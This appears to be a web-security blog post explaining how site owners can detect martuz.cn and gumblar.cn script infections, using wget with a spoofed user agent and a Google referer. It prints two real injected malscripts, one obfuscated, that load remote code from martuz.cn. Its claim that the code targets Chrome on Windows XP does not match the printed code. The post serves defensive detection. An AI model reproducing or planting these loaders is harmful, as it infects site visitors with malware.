Other times infectious malscripts like martuz.cn or certain variations of gumblar.cn will only try to infect a visitor’s PC if the visitor is coming to the infectious site from a Google search. In that case we would need to set “referer” to Google’s home page.

Here’s how we do it with wget. You would enter this in your command prompt:

wget –user-agent=’Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’ –referer=http://www.google.com http://www.yoursitehere.com

Obviously you would change the http://www.yoursitehere.com with your webpage. For instance, if your website is http://www.joesbarandgrill.com you would simply use the above command but with http://www.joesbarandgrill.com in place of http://www.yoursitehere.com

This will download your homepage into the current directory on your PC.

If your site has already been indexed by Google and found to have infectious webpages, you can use this Google search to find out which pages Google has found malscripts on.

site:yoursitehere.com

The Search Engine Results Pages (SERPs) will show you each page from your site and any pages that Google thinks has malscripts on them will display their warning “This site may harm your computer”.

You should use wget for each page that Google lists as hosting malscripts by providing the complete URL in the wget command line.

For instance, if you have a webpage contactus.html and it’s listed in Google SERPs as hosting malscripts, then you would use this wget command:

wget –user-agent=’Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’ –referer=http://www.google.com http://www.yoursitehere.com/contactus.html

That will download contactus.html into your current directory and you would scan that for any malscripts.

Now that you have downloaded your webpages into your current directory, you can begin the process of searching through the files.

While at your command prompt type in:

edit index.html

Then use search->find and type in the word: mart

The reason you don’t search for martuz.cn is that the cybercriminals know that would make it too easy for you to find. Their script (one of them we’ve found) looks like this:

var a="Script Engine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.w rite("<script src=//mar tu"+"z.cn/vid/?id="+j+"><\/script>");}

So you can see that if you were to scan for martuz, you’d never find it because their malscript uses string concatentation to “build” martuz.cn (martu + z.cn)

Here’s another martuz script we found:

(f u n c t i o n(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

If you look at this second malscript you won’t find martuz or mart or any other text even close to the first malscript. If you find any script like this in your downloaded webpages, more than likely your site is serving infectious code. This is an example of the steps cybercriminals will go through to obfuscate their malscripts.

You’ll have to scan through each file on your website in order to see if you have any martuz.cn infections. If you do find them, you should scan your PC for any viruses with AVG, Avast or Malwarebytes, clean it, change the FTP password to your site and upload your last known, good backup. You do have a backup right?

We are working on a video to show you how to move away from FTP and use SSH/SCP instead, but we’re not quite ready with it yet.

If you subscribe to this blog, you’ll get an update when it’s ready.

Thank you. We hope you found this useful. If you have any questions, please email us or post your comments below.

By

New Domain – Same Damage

If you have a website, you may have had your website attacked by cybercriminals using the Gumblar.cn hack.

This hack was responsible for thousands of websites serving infectious code to their visitors.

However, the domain that was hosting further links to malicious downloads was gumblar.cn however, that domain has been shutdown and now many of the newer infections are using martuz.cn as their primary malicious download domain.

What the new code does is check to see if you are visiting using the Google Chrome browser on Windows XP and your browser is set to allow cookies.

I think, the reason behind this is to prevent the automated scanners from finding their infectious code. Many scanners don’t try different user agents, referers or allow cookies. This prevents them from finding these new malscripts.

We’ve even seen where sites had their robots.txt file modified and only the webpages that were serving up malscripts were inserted into the robots.txt so Google wouldn’t index them.

This all points to the fact that many people rely on Google to check their site for malscripts. Google will of course post their moniker “This site may harm your computer” on all of the Search Engine Result Pages (SERPs) and browsers like Google Chrome and Firefox will alert all visitors to the infectious website of it’s malware intentions. This typically will create a desire in some to notify the site owner who then goes into recovery mode to clean their site.

You can’t just scan your sites for any line that contains martuz.cn as the script files being inserted have obfuscated the domain name so it must be concatenated in order to see it. The malscripts are inserted into .htm, .html, .asp, .aspx, .js and .php files.

The cybercriminals have been very clever at disguising their malscripts.

It still appears that the way the cybercriminals gain access to websites is through a virus on the system that uploads to the website. This virus doesn’t seem to be detectable by many of the more popular anti-virus programs. We’ve worked with thousands of site owners, many of them had Norton or McAfee and they weren’t able to detect the virus.

We’ve been recommending AVG or Avast or Malwarebytes. These seem to find the virus after many scans with other anti-virus programs failed.

We also recommend getting away from FTP. We’re putting together some video instructions on the why’s and how’s of moving away from FTP. We’ll post here when we have them ready. It should be later this week.

Until then, watch your websites for any changes. It’s the only way.